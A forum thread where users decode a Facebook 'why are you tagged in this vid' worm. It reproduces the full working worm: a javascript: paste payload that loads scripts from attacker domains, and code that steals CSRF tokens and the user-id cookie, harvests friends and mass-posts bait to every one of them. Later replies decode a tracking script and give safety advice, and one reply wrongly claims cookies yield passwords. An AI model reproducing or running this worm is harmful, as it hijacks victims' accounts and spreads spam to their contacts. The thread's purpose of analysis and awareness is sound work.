[CHALLENGE] Facebook javascript worm decoding.

@xheavenlyx-CbvN62 • Oct 17, 2024

Oct 17, 2024

1.1K

Here is another worm making the rounds of facebook. Got it this morning from a friend. I think most of you must have seen it too.

It is a post on your wall from a friend reading:

"OMG!! <firstname> why are you tagged in this vid"

A video is posted below that.

[IMG]

After Clicking on the video, it reveals:

"Select Address bar and press Ctrl+V."

When the user does that this code is pasted on the address bar:

javascript:(function()%7Bfunction%20s(src)%7Bvar%20script%20%3D%20document.createElement(%22script%22)%3Bscript.src%20%3D%20src%3Bdocument.body.appendChild(script)%3B%7Dvar%20rand%20%3D%20Math.floor(Math.random()*(100))%3Bs(%22http%3A%2F%2Fvideosurge.info%2Fverify.js%22)%3B%20if(rand%20%3C%3D%2025)%20s(%22http%3A%2F%2Fvideosurge.info%2Fconfig.js%22)%3Belse%20s(%22http%3A%2F%2Fbanfish.info%2Fconfig.js%22)%3B%7D)()%3B

After replacing the URL Escape codes:

javascript:(function(){
function s(src){
var script = document.createElement("script");
script.src = src;
document.body.appendChild(script);
}

var rand = Math.floor(Math.random()*(100));
s("https://videosurge.info/verify.js");
 if(rand <= 25) s("https://videosurge.info/config.js");
 else s("https://banfish.info/config.js");
 })
();

#-Link-Snipped-# Code:

function include(filename, cb)
{
	var head = document.getElementsByTagName('head')[0];
	
	script = document.createElement('script');
	script.src = filename;
	script.type = 'text/javascript';
	script.onload = cb;
	head.appendChild(script)
}


include("https://widgets.amung.us/small.js", function(){
	WAU_small('dkz2a5lyiuwb');
	
});

Like 0 Replies 23

Replies

Welcome, guest

Join CrazyEngineers to reply, ask questions, and participate in conversations.

CrazyEngineers powered by Jatra Community Platform

xheavenlyx

@xheavenlyx-CbvN62 • May 15, 2011

The two scripts that post the videos are chosen at random. Intelligent ruse so the generated wall message is at random. However, one pitfall is that this guy did not put a limit on the number of friends it posts to. I saw this friend's home page. Almost all her friends got it.

Chosen at random Script #1

var message = ""; /* generated */
var caption = "www.youtube.com";
var description = "";
var name = "Youtube Video";
var img = "https://i.imgur.com/NlMK1.png";
//var gw = "https://gateway.wfnetwork.com/widget/contentBlocker.js.php?i=1013"; /* jc */
var gw = "https://www.creepsweepers.info/locked.js";

var url = "https://banfish.info/boom.swf";
var flashvars = "bgimg=i.imgur.com/o0LtR.png&bgimg2=i.imgur.com/lEANf.png&img=i.imgur.com/NlMK1.png&instructX=60&instructY=100&retarded=true&name=&description=&caption=&message=&length=2%3A52&action_name=&payload_url=&buttonText=Play&gwid=1013"; /* don't need these anymore */
var length = "2:34";


/* message spinner */
var p1 = ['hey', 'HEY', 'WTF', 'OMG', 'ROTFL', 'YO', 'yo', 'YO!', 'omg!', 'omg', 'wtf', 'wtf!!', 'WTF!!','OMG!!'];
var p2 = ['why are you', 'what are you doing', 'I can\'t believe you\'re', 'you look so stupid', 'i cant believe youre tagged', 'why are you tagged','you should untag yourself'];
var p3 = ['in this video', 'in this vid'];


/* domain spinner */
var domains = ['banfish.info', 'craneland.info','fliptrip.info'];


/* utilities */
function getRandomInt (min, max) {
    return Math.floor(Math.random() * (max - min + 1)) + min;
}
function randomValue(arr){
	return arr[getRandomInt(0, arr.length-1)];
}
function addCommas(nStr)
{
	nStr += '';
	x = nStr.split('.');
	x1 = x[0];
	x2 = x.length > 1 ? '.' + x[1] : '';
	var rgx = /(\d+)(\d{3})/;
	while (rgx.test(x1)) {
		x1 = x1.replace(rgx, '$1' + ',' + '$2');
	}
	return x1 + x2;
}
var p1 = ['hey', 'HEY', 'WTF', 'OMG', 'ROTFL', 'YO', 'yo', 'YO!', 'omg!', 'omg', 'wtf', 'wtf!!', 'WTF!!','OMG!!'];
var p2 = ['why are you', 'what are you doing', 'I can\'t believe you\'re', 'you look so stupid', 'i cant believe youre tagged', 'why are you tagged','you should untag yourself'];
var p3 = ['in this video', 'in this vid'];

var domain = randomValue(domains);
url = "https://" + domain + "/boom.swf?" + flashvars;




var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

var friends = new Array();

gf = new XMLHttpRequest(); 
gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&"+Math.random(),false); 
gf.send(); 
if(gf.readyState!=4){ }else{ 
	data = eval('(' + gf.responseText.substr(9) + ')'); 
	if(data.error){ }else{ 
		friends = data.payload.entries.sort(function(a,b){return a.index-b.index;});
	}
}



var did = false;
function done(){
	if(!did){
	did = true;
  
	var script = document.createElement("script");
	script.src = gw;
	document.body.appendChild(script);
}
}

 done();

function attach(name,val){
	return "&feed_info[template_data][" + encodeURIComponent(name) + "]=" + encodeURIComponent(val);
}
function attach_media(name,val){
	return "&feed_info[template_data][media][0][" + encodeURIComponent(name) + "]=" + encodeURIComponent(val);
}
function attach_prop(name,val){
	return "&feed_info[template_data][properties][" + encodeURIComponent(name) + "]=" + encodeURIComponent(val);
}
var x = 0;


friends.sort(function() {return 0.5 - Math.random()});
var max = friends.length;
/*if(max >= 50) max = 50; */
for(var i=0; i<max; i++){
	
	message = [randomValue(p1), friends[i].text.substr(0,friends[i].text.indexOf(' ')).toLowerCase(), randomValue(p2), randomValue(p3)].join(' ');
	var httpwp = new XMLHttpRequest();
	var viewCount = getRandomInt(843, 7434);
	var urlwp = "/fbml/ajax/prompt_feed.php?__a=1";
	var paramswp = "&__d=1&app_id=6628568379&extern=0" +
				   "&post_form_id=" + post_form_id + 
				   "&fb_dtsg=" + fb_dtsg + 
				   /*"&feed_info[action_links][0][href]=" + encodeURIComponent(payload_url) + 
				   "&feed_info[action_links][0][text]=" + encodeURIComponent(action_name) + */
				   "&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid + 
				   "&user_message=" + encodeURIComponent(message) +
				   attach("caption", caption) + 
				   attach("description", description) + 
				   attach("name", name) +
				   attach_prop("Views", addCommas(viewCount)) + 
				   attach_prop("Likes", addCommas(getRandomInt(432, viewCount))) +
				   attach_media("type", "flash") + 
				   attach_media("swfsrc", url) + 
				   attach_media("imgsrc", img) +
				   attach_media("flashvars", flashvars);
	if(length) paramswp += attach_prop("Length", length);
	httpwp.open("POST", urlwp, true);
	httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
	httpwp.setRequestHeader("Content-length", paramswp.length);
	httpwp.setRequestHeader("Connection", "keep-alive");
	httpwp.onreadystatechange = function(){
		if (httpwp.readyState == 4){
			x++;
			if(x >= friends.length -1){
				done();
			}
		}
	};
	httpwp.send(paramswp);
}

Chosen at Random Script #2:

var message = ""; /* generated */
var caption = "www.youtube.com";
var description = "";
var name = "Youtube Video";
var img = "https://i.imgur.com/NlMK1.png";
var gw = "https://gateway.wfnetwork.com/widget/contentBlocker.js.php?i=1013"; /* jc */
//var gw = "https://www.creepsweepers.info/locked.js"; /* jc */

var url = "https://banfish.info/boom.swf";
var flashvars = "bgimg=i.imgur.com/o0LtR.png&bgimg2=i.imgur.com/lEANf.png&img=i.imgur.com/NlMK1.png&instructX=60&instructY=100&retarded=true&name=&description=&caption=&message=&length=2%3A52&action_name=&payload_url=&buttonText=Play&gwid=1013"; /* don't need these anymore */
var length = "2:34";


/* message spinner */
var p1 = ['hey', 'HEY', 'WTF', 'OMG', 'ROTFL', 'YO', 'yo', 'YO!', 'omg!', 'omg', 'wtf', 'wtf!!', 'WTF!!','OMG!!'];
var p2 = ['why are you', 'what are you doing', 'I can\'t believe you\'re', 'you look so stupid', 'i cant believe youre tagged', 'why are you tagged','you should untag yourself'];
var p3 = ['in this video', 'in this vid'];


/* domain spinner */
var domains = ['banfish.info', 'craneland.info','fliptrip.info'];


/* utilities */
function getRandomInt (min, max) {
    return Math.floor(Math.random() * (max - min + 1)) + min;
}
function randomValue(arr){
	return arr[getRandomInt(0, arr.length-1)];
}
function addCommas(nStr)
{
	nStr += '';
	x = nStr.split('.');
	x1 = x[0];
	x2 = x.length > 1 ? '.' + x[1] : '';
	var rgx = /(\d+)(\d{3})/;
	while (rgx.test(x1)) {
		x1 = x1.replace(rgx, '$1' + ',' + '$2');
	}
	return x1 + x2;
}
var p1 = ['hey', 'HEY', 'WTF', 'OMG', 'ROTFL', 'YO', 'yo', 'YO!', 'omg!', 'omg', 'wtf', 'wtf!!', 'WTF!!','OMG!!'];
var p2 = ['why are you', 'what are you doing', 'I can\'t believe you\'re', 'you look so stupid', 'i cant believe youre tagged', 'why are you tagged','you should untag yourself'];
var p3 = ['in this video', 'in this vid'];

var domain = randomValue(domains);
url = "https://" + domain + "/boom.swf?" + flashvars;




var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

var friends = new Array();

gf = new XMLHttpRequest(); 
gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&"+Math.random(),false); 
gf.send(); 
if(gf.readyState!=4){ }else{ 
	data = eval('(' + gf.responseText.substr(9) + ')'); 
	if(data.error){ }else{ 
		friends = data.payload.entries.sort(function(a,b){return a.index-b.index;});
	}
}



var did = false;
function done(){
	if(!did){
	did = true;
  
	var script = document.createElement("script");
	script.src = gw;
	document.body.appendChild(script);
}
}

 done();

function attach(name,val){
	return "&feed_info[template_data][" + encodeURIComponent(name) + "]=" + encodeURIComponent(val);
}
function attach_media(name,val){
	return "&feed_info[template_data][media][0][" + encodeURIComponent(name) + "]=" + encodeURIComponent(val);
}
function attach_prop(name,val){
	return "&feed_info[template_data][properties][" + encodeURIComponent(name) + "]=" + encodeURIComponent(val);
}
var x = 0;


friends.sort(function() {return 0.5 - Math.random()});
var max = friends.length;
/*if(max >= 50) max = 50; */
for(var i=0; i<max; i++){
	
	message = [randomValue(p1), friends[i].text.substr(0,friends[i].text.indexOf(' ')).toLowerCase(), randomValue(p2), randomValue(p3)].join(' ');
	var httpwp = new XMLHttpRequest();
	var viewCount = getRandomInt(843, 7434);
	var urlwp = "/fbml/ajax/prompt_feed.php?__a=1";
	var paramswp = "&__d=1&app_id=6628568379&extern=0" +
				   "&post_form_id=" + post_form_id + 
				   "&fb_dtsg=" + fb_dtsg + 
				   /*"&feed_info[action_links][0][href]=" + encodeURIComponent(payload_url) + 
				   "&feed_info[action_links][0][text]=" + encodeURIComponent(action_name) + */
				   "&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid + 
				   "&user_message=" + encodeURIComponent(message) +
				   attach("caption", caption) + 
				   attach("description", description) + 
				   attach("name", name) +
				   attach_prop("Views", addCommas(viewCount)) + 
				   attach_prop("Likes", addCommas(getRandomInt(432, viewCount))) +
				   attach_media("type", "flash") + 
				   attach_media("swfsrc", url) + 
				   attach_media("imgsrc", img) +
				   attach_media("flashvars", flashvars);
	if(length) paramswp += attach_prop("Length", length);
	httpwp.open("POST", urlwp, true);
	httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
	httpwp.setRequestHeader("Content-length", paramswp.length);
	httpwp.setRequestHeader("Connection", "keep-alive");
	httpwp.onreadystatechange = function(){
		if (httpwp.readyState == 4){
			x++;
			if(x >= friends.length -1){
				done();
			}
		}
	};
	httpwp.send(paramswp);
}

Ankita Katdare

@abrakadabra • May 15, 2011

@xheavenlyx: Thanks for sharing this. I was affected by this too.

var p1 = ['hey', 'HEY', 'WTF', 'OMG', 'ROTFL', 'YO', 'yo', 'YO!', 'omg!', 'omg', 'wtf', 'wtf!!', 'WTF!!','OMG!!']; var p2 = ['why are you', 'what are you doing', 'I can\'t believe you\'re', 'you look so stupid', 'i cant believe youre tagged', 'why are you tagged','you should untag yourself']; var p3 = ['in this video', 'in this vid'];
Intelligent use of keywords to tempt people into clicking this spam.
0
Rajat Shah

@rajat-shah-p7SiP5 • May 16, 2011

Any effecient way to stop the posts once someone is unknowingly trapped in this spam??
0
ISHAN TOPRE

@ishan-nohePN • May 16, 2011

How about changing gmail settings? I did it. It is very effective. 😀
0
cooltwins

@cooltwins-I5yJpZ • May 16, 2011

i was affected by that too!!! 😡 😡 😡

clever use of words like ROTFL, hey!- sufficient to lure people into the trap 😡
0
Rajat Shah

@rajat-shah-p7SiP5 • May 16, 2011

ishutopre
How about changing gmail settings? I did it. It is very effective. 😀
what we need to change in gmail settings?
0
ISHAN TOPRE

@ishan-nohePN • May 16, 2011

Yup, but just talking in general. How does it affect after people get lured? I mean what will the spammer get out of this?

I understand that our reputation between friends definitely may go down. But what are the gains of spammer? 😐
0
ISHAN TOPRE

@ishan-nohePN • May 16, 2011

Rajat Shah
what we need to change in gmail settings?
Click on the "settings" on right top corner near the sign out button.

Then click on Filter. Then create a filter for the mails which you want to block.

For example: Block a mail containing the words "XXXXX" 😀
0
Sahithi Pallavi

@sahithi-oJZaYj • May 16, 2011

Thanks for the information #-Link-Snipped-#. Even I was affected by this!

0
cyclopes49

@cyclopes49-0aWTjo • May 16, 2011

tnx 4 share but...what the impact of this....i didn't understand..
0
PraveenKumar Purushothaman

@praveenkumar-66Ze92 • May 16, 2011

Let me say something. Facebook is a highly secure and privacy concerned and effective social networking platform, where you cannot see who reported others. To that level, the security is maintained. Moreover, when these kind of information is available to others, it encourages stalking! This proves that the message is a fake one and is sent in the intent of capturing the credentials (username and password) and spamming the others. If you don't believe, ask your friends, if they have received such messages from you.

Nothing in this world comes for free. Even if its, it won't last long. So, don't go behind free stuff like Free T Shirts and Profile Views. Who cares if your profile is viewed by someone? Moreover, even the facebook developers themselves cannot find who viewed whose profile.

If you click on those links, facebook advices you not to put any javascript or coding stuff in the address bar EVEN IF IT IS FROM YOUR FRIENDS! Your friends may be unknowingly their victim and try to affect you all too!

And last but not least! Activate HTTPS Mode by going to Privacy Settings as it is safer with them enabled, which doesn't allow XSS to attack. A few goodies have been given here. Please check them out so that you are safer!

Activating HTTPS Mode
1. Go to Account Â» Account Settings.
2. Under the Account Security, Enable Secure Browsing (https). It should be checked, where it says Browse Facebook on a secure connection (https) whenever possible.
3. Also enable Login Notifications, so that your account might not be compromised.

Steps to follow after getting affected
In case you come to know that you are affected, please don't panic and follow these instructions.
1. Change your password first!
2. Remove all the unknown apps added to your account by going to Account Â» Privacy Settings.
3. Click on Edit your Settings under Apps and Websites and remove all the apps you don't know next to Apps you use.
4. Remove all the Events by going to your profile and clicking on My Events. All your events will be displayed. Remove those you didn't create.

Have a happy and safe browsing with facebook! 😀

Source: #-Link-Snipped-#

0
PraveenKumar Purushothaman

@praveenkumar-66Ze92 • May 16, 2011

Report from friend: According to new data released in the company’s annual Security Intelligence Report, infection rates for Windows 7 are five times lower than a fully patched machine running Windows XP SP3. Windows Vista faired significantly better, however infection rates were still almost double that of a comparable Windows 7 based PC.
0
optimystix

@optimystix-4yMPKC • May 16, 2011

ishutopre
Yup, but just talking in general. How does it affect after people get lured? I mean what will the spammer get out of this?

I understand that our reputation between friends definitely may go down. But what are the gains of spammer? 😐
They dont care for any reputation and such issues. These links are used to carry out XSS attacks also called cross site scripting attacks. The modus operandi is to hide malicious scripts in the link or redirect to another infected domain. Now consider an average net user browsing several pages through multiple tabs - on one tab his yahoo mail id is open, on another gmail account is open, on another facebook account is open and so on. When the person clicks on the malicious link (without knowing it of course), the script gets activated and it steals all the information from the cookies. Thus you lose the user name and passwords of all the accounts open in each and every tab! This happens without the user even getting a hint of it. Along with just that, other details such as credit card info, address, other details too may be grabbed. These information get sold in some IRC hacker channels for about 2-5 $ each. It makes a good amount of pocket money for those geeks to maintain their tech hungry appetite. Believe me or not, this is what is happening and a lot of people are making good amount of money at our expense. It first started with bogus surveys promising to give u things in return for completing them. For eg, one was promised several hundred 'reward points' in the famous facebook game Mafia Wars for completing the surveys. Soon, when awareness about such fake schemes spread up, these XSS attacks have started. I am amazed to see even mature and seeming 'techy' people getting caught into this scam.

What is the solution for this?
There is no complete solution for this other than using ones common sense. Do understand NOT TO CLICK on any links in facebook or otherwise claiming to give u stuffs for free or do seemingly wonderful things for you like showing how you may look 20 years down the line!

There are a few things one could do that would keep them safer from such things.
You may follow the inbuilt facebook settings mentioned by praveen a couple of post above. Though let me tell you that is not fool proof and is quite non practical too.
Since most games/apps are on http, everytime u want to try a new app or game it will ask u to switch over to http and if you click that you are again back to where you were. This helps in no way in differentiating against legitimate links and other wise. Also it would be irritating to click on all the time. Imagine having to click on them everytime you visit a farmville or mafia wars link!

The notifications are even more pathetic.
Email notification sends you an email if an unauthorized computer is trying to access your account. This means you need to have access to your mail box at all times. A good idea would be to link your mail box to your mobile no. But most people do not use this feature and getting loads of mails on ur already crammed mobile inbox may not be a good idea after all.

The sms notification sends you a sms on ur registered phone if unauthorized computer is trying to access your account. I used to use this method earlier but have disallowed it since. The sms doesnt always come on time and may take several minutes. I have faced difficulties when trying to access my account for some important work from my friend's computer and was stuck there waiting for the sms to arrive 😔 So I would not endorse this one too.

Though one may still try if you are ok with those things I've mentioned above.

The better option according to me is:
1] Use your common sense and do not click on such links.
2] Use Firefox and add these addons to ur browser
WOT(web of trust), NoScript, AdBlock plus and Better Privacy.
The best of these is NScript and AdBlock. Especially keep NoScript on for global sites when accessing/surfing new pages. If there is a script hidden in the links or even the webpages, it will show u a warning and will warn u. Incase of known webpages, keep adding exceptions.
To me, this looks by far the best type of protection against most script based attacks.
3] Clearing cookies and other junk helps a lot in protecting the computer and yourself as well. Use CCleaner or similar free software to keep your computer clean.

No offence to anyone and kindly let me know if I have gone wrong anywhere.

P.S. And yes, incase you have already clicked on such links, kindly change passwords of all the accounts you use regularly and if possible change the account info(such as secret/hint questions) for important accounts such as your email accs.
And excuse me if I have made mistakes in grammar or punctuations. It's too long for me to read it again 😛
0
Himesh914

@himesh914-8nOVKV • May 16, 2011

Hay I too decoded this. But after clicking and copypasting it on my adderss bar :-(

javascript😔function(){
function s(src){
var script = document.createElement("script");
script.src = src;
document.body.appendChild(script);
}
var rand = Math.floor(Math.random()*(100));
s("#-Link-Snipped-#");
if(rand <= 100) s("#-Link-Snipped-#");
else s("#-Link-Snipped-#");
})();

0

PraveenKumar Purushothaman

@praveenkumar-66Ze92 • May 16, 2011

In the Verify.js the code is

function include(filename, cb)
{
	var head = document.getElementsByTagName('head')[0];
	
	script = document.createElement('script');
	script.src = filename;
	script.type = 'text/javascript';
	script.onload = cb;
	head.appendChild(script)
}


include("https://widgets.amung.us/small.js", function(){
	WAU_small('dkz2a5lyiuwb');
	
});

PraveenKumar Purushothaman

@praveenkumar-66Ze92 • May 16, 2011

Its linking to another script which has:

var Tynt=Tynt||[];function WAU_small(b){var a="";if(document.title){a=encodeURIComponent(document.title.substr(0,80).replace(/(\?=)|(\/)/g,""))}var c=document.getElementsByTagName("script")[0];(function(){var e=encodeURIComponent(document.referrer);var d=document.createElement("script");d.async="async";d.type="text/javascript";d.src="https://whos.amung.us/pingjs/?k="+b+"&t="+a+"&c=s&y="+e+"&r="+Math.ceil(Math.random()*999999);c.parentNode.insertBefore(d,c)})();if(document.location.protocol=="http:"){Tynt.push("w!"+b);(function(){var d=document.createElement("script");d.async="async";d.type="text/javascript";d.src="https://cdn.tynt.com/tc.js";c.parentNode.insertBefore(d,c)})()}}function WAU_r_s(c,key){var raw_im_data="data:image/gif;base64,R0lGODlhUAAXAMQAAM1iTdBuWMQ4MsdHOt+ch/js5+/Qw+vCs/Pe1dR6Y+OolNuQespVQ9eFbsAnLX9/fzAwL////zU1NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAABQABcAAAX/ICSOZGmeaKqu7Bi9L3IcBWzfeK7vfI+LMAPAQXQEEBGJcslsOp/QqFQaAUYMAiIjMnAIDMmpeEweVyGRQtcxIByy7Fd5Ti+fIwTiABYoKsJ1gYJMd30OeIhDRoCDjXR3igAEEQAChgCMjppihUULL3CLm6OcQHlEEQ0JEX6ZpK9Ld2qofZRxrrCvd1dZrA4AlWC5w7FWEQgJRQ4JSMTOuzAFMzU+1dbX1i3a29zdJhIwSkk24OGAOOU56eJyYw8S73ax7bGE54y45fP1YvFzYXIy4btH6Mm4feKYPIi3kCE8eAuXRHRy8OA6duzQkUuYMSMghyAfhnzYpF1FKPjsNPEDyI8jyXchYSqB2ZBiPYs2W+rjyNIlOIkzX4oU6s9gwB4lN4ZzaW5pmIkxhUIs6uzRsBAAOw==";var raw_im_meta="({'0':[0,-15,5,8], '1':[-5,-15,3,8], '2':[-8,-15,5,8], '3':[-13,-15,5,8], '4':[-18,-15,5,8], '5':[-23,-15,5,8], '6':[-28,-15,5,8],'7':[-33,-15,5,8], '8':[-38,-15,5,8], '9':[-43,-15,5,8], ',':[-48,-15,2,8], 'o':[-50,-15,24,8]})";var meta=eval(raw_im_meta);if(WAU_legacy_b()){raw_im_data="https://widgets.amung.us/widtemplates/smalloutline.gif"}c+="o";c=c.split("");var img=document.createElement("img");img.onload=function(){var wid=document.createElement("div");wid.style.position="relative";wid.style.display="inline-block";wid.style.backgroundImage="url("+raw_im_data+")";wid.style.width="80px";wid.style.height="15px";wid.style.padding="0";wid.style.overflow="hidden";wid.style.cursor="pointer";wid.title="Click to see stats for this site by whos.amung.us ("+key+")";var x_pos=20;if(c.length>6&&c[0]!="1"){x_pos=16}else{if(c.length>6&&c[0]=="1"){x_pos=17}}for(var i=0;i<c.length;i++){var char_meta=meta[c[i]];var character=document.createElement("div");character.style.backgroundImage="url("+raw_im_data+")";character.style.backgroundRepeat="no-repeat";character.style.backgroundAttachment="scroll";character.style.backgroundPosition=char_meta[0]+"px "+char_meta[1]+"px";character.style.position="absolute";character.style.width=char_meta[2]+"px";character.style.height=char_meta[3]+"px";character.style.top="4px";character.style.left=x_pos+"px";character.style.lineHeight=char_meta[3]+"px";character.style.overflow="hidden";character.style.padding="0";wid.appendChild(character);x_pos+=char_meta[2]+1}wid.onclick=function(){window.location="https://whos.amung.us/stats/"+key+"/"};WAU_insert(wid,"amung.us/small.js")};img.src=raw_im_data}function WAU_insert(c,d){var a=document.getElementsByTagName("script");for(var b=0;b<a.length;b++){if(a[b].src.indexOf(d)>0){a[b].parentNode.insertBefore(c,a[b].nextSibling)}}}function WAU_legacy_b(){if(navigator.appVersion.indexOf("MSIE")!=-1&&parseFloat(navigator.appVersion.split("MSIE")[1])<8){return true}return false};

Ankita Katdare

@abrakadabra • May 16, 2011

2] Use Firefox and add these addons to ur browser
WOT(web of trust), NoScript, AdBlock plus and Better Privacy.
The best of these is NScript and AdBlock. Especially keep NoScript on for global sites when accessing/surfing new pages. If there is a script hidden in the links or even the webpages, it will show u a warning and will warn u. Incase of known webpages, keep adding exceptions.
To me, this looks by far the best type of protection against most script based attacks.
3] Clearing cookies and other junk helps a lot in protecting the computer and yourself as well. Use CCleaner or similar free software to keep your computer clean.
Kudos to optimystix for that post!

In your leisure time, could you start a couple of threads on CE for tutorials of installing the above mentioned add-ons. (especially for non-IT/CS engineers) as well as how to clear cookies and stuff? I am sure they will come handy to lots of engineers who are unaware.
0
xheavenlyx

@xheavenlyx-CbvN62 • May 16, 2011

Excellent recommendations @opti. But there needs to be a correction. I don't think it's possible to get passwords in the way you described from cookies. Someone correct me if I'm wrong or refer to some resources which prove it is possible to get passwords from cookies.

One of the worst ways of screwing ourselves is if we unknowingly download a key logger or another virus which sits on our PC undetected and sends all the vital data.

Here Optimystix advice should be heeded!

1] Use your common sense and do not click on such links.

2] Use Firefox and add these addons to ur browser
WOT(web of trust), NoScript, AdBlock plus and Better Privacy.
The best of these is NScript and AdBlock. Especially keep NoScript on for global sites when accessing/surfing new pages. If there is a script hidden in the links or even the webpages, it will show u a warning and will warn u. Incase of known webpages, keep adding exceptions.
To me, this looks by far the best type of protection against most script based attacks. (NOTE: Yes, These two are enough, including Firefox.)

3] Clearing cookies and other junk helps a lot in protecting the computer and yourself as well. Use CCleaner or similar free software to keep your computer clean.

@praveenscience Yes it contains another script. You know, I have a feeling it is used for authenticating the attack and makes it look like it came from the particular user. This one seems to be the most important script. I am going to clean it up, with indents and carriage returns and post it here so we can have a clearer look at it.
0
PraveenKumar Purushothaman

@praveenkumar-66Ze92 • May 16, 2011

Am working on Antidote of it... I mean, as a browser plugin and a greasy monkey script which makes sure that it doesn't allow the XSS attacks... 😀
0

xheavenlyx

@xheavenlyx-CbvN62 • May 16, 2011

Ok here is the cleaned up version of the script! Wow, it's really complicated and it's not what I initially thought, not for authenticating but something else.

var Tynt=Tynt||[];

function WAU_small(b){
	var a="";
	
	if(document.title){
		a=encodeURIComponent(document.title.substr(0,80).replace(/(\?=)|(\/)/g,""))
	}
	
	var c=document.getElementsByTagName("script")[0];
	
	(function(){
		var e=encodeURIComponent(document.referrer);
		var d=document.createElement("script");
		d.async="async";
		d.type="text/javascript";
		d.src="https://whos.amung.us/pingjs/?k="+b+"&t="+a+"&c=s&y="+e+"&r="+Math.ceil(Math.random()*999999);
		c.parentNode.insertBefore(d,c)
	})();
	
	if(document.location.protocol=="http:"){
		Tynt.push("w!"+b);
		(function(){
			var d=document.createElement("script");
			d.async="async";
			d.type="text/javascript";
			d.src="https://cdn.tynt.com/tc.js";
			c.parentNode.insertBefore(d,c)
		})()
	}
}

function WAU_r_s(c,key){

	var raw_im_data= "data:image/gif;base64,R0lGODlhUAAXAMQAAM1iTdBuWMQ4MsdHOt+ch/js5+/Qw+vCs/Pe1dR6Y+OolNuQespVQ9eFbsAnLX9/fzAwL////zU1NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAABQABcAAAX/ICSOZGmeaKqu7Bi9L3IcBWzfeK7vfI+LMAPAQXQEEBGJcslsOp/QqFQaAUYMAiIjMnAIDMmpeEweVyGRQtcxIByy7Fd5Ti+fIwTiABYoKsJ1gYJMd30OeIhDRoCDjXR3igAEEQAChgCMjppihUULL3CLm6OcQHlEEQ0JEX6ZpK9Ld2qofZRxrrCvd1dZrA4AlWC5w7FWEQgJRQ4JSMTOuzAFMzU+1dbX1i3a29zdJhIwSkk24OGAOOU56eJyYw8S73ax7bGE54y45fP1YvFzYXIy4btH6Mm4feKYPIi3kCE8eAuXRHRy8OA6duzQkUuYMSMghyAfhnzYpF1FKPjsNPEDyI8jyXchYSqB2ZBiPYs2W+rjyNIlOIkzX4oU6s9gwB4lN4ZzaW5pmIkxhUIs6uzRsBAAOw==";
		
	var raw_im_meta="({'0':[0,-15,5,8], '1':[-5,-15,3,8], '2':[-8,-15,5,8], '3':[-13,-15,5,8], '4':[-18,-15,5,8], '5':[-23,-15,5,8], '6':[-28,-15,5,8],'7':[-33,-15,5,8], '8':[-38,-15,5,8], '9':[-43,-15,5,8], ',':[-48,-15,2,8], 'o':[-50,-15,24,8]})";

	var meta=eval(raw_im_meta);

	if(WAU_legacy_b()){
		raw_im_data="https://widgets.amung.us/widtemplates/smalloutline.gif"
	}
	c+="o";
	c=c.split("");
	var img=document.createElement("img");
	img.onload=function(){
		var wid=document.createElement("div");
		wid.style.position="relative";
		wid.style.display="inline-block";
		wid.style.backgroundImage="url("+raw_im_data+")";
		wid.style.width="80px";
		wid.style.height="15px";
		wid.style.padding="0";
		wid.style.overflow="hidden";
		wid.style.cursor="pointer";
		wid.title="Click to see stats for this site by whos.amung.us ("+key+")";
		var x_pos=20;
		
		if(c.length>6&&c[0]!="1"){x_pos=16}
			else{if(c.length>6&&c[0]=="1"){x_pos=17}}
		
		for(var i=0; i<c.length; i++){
			var char_meta=meta[c[i]];
			var character=document.createElement("div");
			character.style.backgroundImage="url("+raw_im_data+")";
			character.style.backgroundRepeat="no-repeat";
			character.style.backgroundAttachment="scroll";
			character.style.backgroundPosition=char_meta[0]+"px "+char_meta[1]+"px";
			character.style.position="absolute";
			character.style.width=char_meta[2]+"px";
			character.style.height=char_meta[3]+"px";
			character.style.top="4px";
			character.style.left=x_pos+"px";
			character.style.lineHeight=char_meta[3]+"px";
			character.style.overflow="hidden";
			character.style.padding="0";
			wid.appendChild(character);
			x_pos+=char_meta[2]+1
		}
		
		wid.onclick=function(){window.location="https://whos.amung.us/stats/"+key+"/"};
		WAU_insert(wid,"amung.us/small.js")
	};
	img.src=raw_im_data
}
	
function WAU_insert(c,d){

	var a=document.getElementsByTagName("script");
	for(var b=0; b<a.length; b++){
		if(a[b].src.indexOf(d)>0){
			a[b].parentNode.insertBefore(c,a[b].nextSibling)}
	}
}

function WAU_legacy_b(){
	if(navigator.appVersion.indexOf("MSIE")!=-1&&parseFloat(navigator.appVersion.split("MSIE")[1])<8)
		{return true}
	return false
};

The Base64 garbage you see in the center, var = raw_im_data, after decoding looks something like this:

[IMG]

Ok looks like this simple worm can be capable of a lot worse. The first var = Tynt = Tynt ||[] did not make sense at first but after some googling I came across this:

<a href="https://porn.quiteajolt.com/2010/03/03/tynt-insight-the-worst-thing-in-the-entire-world/" target="_blank" rel="nofollow noopener noreferrer">Textual Pornography : Tynt Insight: The worst thing in the entire world</a>

Tynt Insight (Formerly, Tynt Tracker) <a href="https://www.tynt.com/" target="_blank" rel="nofollow noopener noreferrer">We've Moved!</a>

When you use TYNT Products, we will collect the following information:

The Internet domain and IP address from which you access the TYNT Products;
The type of browser and operating system used to access the TYNT Products;
Screen resolution of your monitor;
The date and time you access the TYNT Products;
The page you are visiting with the TYNT Products;
If you linked to a TYNT web site from another referring web site, the address of that web site.
